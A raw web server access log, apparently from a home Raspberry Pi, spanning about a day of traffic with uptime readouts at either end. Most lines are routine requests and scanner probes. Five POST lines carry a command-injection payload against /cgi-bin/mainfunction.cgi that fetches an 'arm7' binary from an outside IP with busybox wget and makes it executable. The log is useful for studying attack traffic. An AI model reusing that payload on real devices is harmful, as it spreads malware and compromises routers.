Fri Apr 3 06:25:06 MDT 2020 06:25:06 up 38 days, 10:53, 1 user, load average: 0.37, 0.26, 0.23 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 38days 30:41 2.04s /usr/bin/lxsession -s LXDE-pi -e LXDE 46.245.2.165 - - [03/Apr/2020:13:35:35 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 212.129.41.188 - - [03/Apr/2020:13:46:27 +0000] "GET / HTTP/1.1" 200 25000 "" "" 196.52.43.56 - - [03/Apr/2020:14:20:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36" 82.130.196.246 - - [03/Apr/2020:15:14:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 5.8.10.202 - - [03/Apr/2020:15:39:38 +0000] "GET /crd HTTP/1.1" 404 0 "" "Go-http-client/1.1" 162.243.131.167 - - [03/Apr/2020:15:51:39 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 191.109.124.127 - - [03/Apr/2020:15:59:25 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 191.109.124.127 - - [03/Apr/2020:15:59:26 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 189.46.114.216 - - [03/Apr/2020:16:31:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 189.46.114.216 - - [03/Apr/2020:16:31:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 189.46.114.216 - - [03/Apr/2020:16:31:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 208.91.109.18 - - [03/Apr/2020:16:45:14 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 208.91.109.18 - - [03/Apr/2020:16:45:14 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 45.53.214.92 - - [03/Apr/2020:16:52:17 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 45.53.214.92 - - [03/Apr/2020:16:52:17 +0000] "GET / HTTP/1.1" 200 25000 "" "" 169.197.108.6 - - [03/Apr/2020:17:01:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 174.103.226.6 - - [03/Apr/2020:17:51:27 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 174.103.226.6 - - [03/Apr/2020:17:51:27 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 168.196.41.203 - - [03/Apr/2020:17:59:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 62.233.65.111 - - [03/Apr/2020:18:04:29 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 62.233.65.111 - - [03/Apr/2020:18:04:44 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 195.146.10.254 - - [03/Apr/2020:19:42:12 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 195.146.10.254 - - [03/Apr/2020:19:42:12 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 139.194.26.135 - - [03/Apr/2020:20:14:30 +0000] "GET / HTTP/1.0" 200 25000 "" "" 139.194.26.135 - - [03/Apr/2020:20:14:33 +0000] "GET / HTTP/1.0" 200 25000 "" "" 139.194.26.135 - - [03/Apr/2020:20:14:34 +0000] "GET / HTTP/1.0" 200 25000 "" "" 139.194.26.135 - - [03/Apr/2020:20:14:35 +0000] "GET / HTTP/1.0" 200 25000 "" "" 139.194.26.135 - - [03/Apr/2020:20:14:48 +0000] "GET / HTTP/1.0" 200 25000 "" "" 185.234.217.95 - - [03/Apr/2020:20:28:05 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 185.234.217.95 - - [03/Apr/2020:20:28:05 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.234.217.95 - - [03/Apr/2020:20:28:08 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 217.24.147.196 - - [03/Apr/2020:20:37:17 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 103.4.65.78 - - [03/Apr/2020:20:58:56 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 103.4.65.78 - - [03/Apr/2020:20:58:56 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 187.207.107.40 - - [03/Apr/2020:22:02:55 +0000] "GET / HTTP/1.1" 400 0 "" "" 104.2.249.76 - - [03/Apr/2020:22:03:24 +0000] "GET / HTTP/1.0" 200 25000 "" "" 162.243.129.77 - - [03/Apr/2020:22:54:25 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 167.99.40.21 - - [04/Apr/2020:00:06:11 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 167.99.40.21 - - [04/Apr/2020:00:06:14 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 167.99.40.21 - - [04/Apr/2020:00:06:17 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 185.202.2.226 - - [04/Apr/2020:00:44:37 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 2.184.35.253 - - [04/Apr/2020:02:17:58 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 177.130.252.251 - - [04/Apr/2020:02:49:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 36.73.243.178 - - [04/Apr/2020:02:50:48 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 175.138.136.37 - - [04/Apr/2020:03:54:03 +0000] "GET / HTTP/1.1" 400 0 "" "" 13.77.107.52 - - [04/Apr/2020:05:15:29 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 172.104.242.173 - - [04/Apr/2020:05:53:53 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 78.31.71.82 - - [04/Apr/2020:06:33:14 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 45.13.93.90 - - [04/Apr/2020:08:04:57 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 177.74.157.183 - - [04/Apr/2020:08:11:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 171.67.70.85 - - [04/Apr/2020:08:20:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 45.136.108.68 - - [04/Apr/2020:08:56:05 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 163.172.7.215 - - [04/Apr/2020:09:23:15 +0000] "GET / HTTP/1.1" 200 25000 "" "libwww-perl/5.833" 45.136.108.20 - - [04/Apr/2020:10:22:42 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 144.91.101.175 - - [04/Apr/2020:11:52:41 +0000] "GET / HTTP/1.1" 200 25000 "" "libwww-perl/5.833" 177.20.170.132 - - [04/Apr/2020:11:54:14 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" Sat Apr 4 06:25:06 MDT 2020 06:25:06 up 39 days, 10:53, 1 user, load average: 0.31, 0.23, 0.22 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 39days 31:16 2.04s /usr/bin/lxsession -s LXDE-pi -e LXDE